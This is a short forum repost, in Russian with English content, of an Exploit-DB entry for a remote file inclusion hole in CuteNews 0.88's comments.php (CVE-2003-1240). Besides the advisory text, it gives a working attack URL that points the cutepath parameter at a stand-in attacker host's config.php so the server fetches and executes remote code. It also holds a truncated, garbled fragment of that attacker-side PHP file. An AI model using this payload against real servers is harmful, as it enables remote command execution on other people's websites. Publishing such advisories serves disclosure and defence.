Exploit CuteNews 0.88 - 'comments.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22285
Проверка EDB
  1. Пройдено
Автор
OVER_G
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2003-1240
Дата публикации
2003-02-25
Код:
source: https://www.securityfocus.com/bid/6935/info
  
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
  
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
  
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/cutenews/comments.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
  
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
 
Источник
www.exploit-db.com

Похожие темы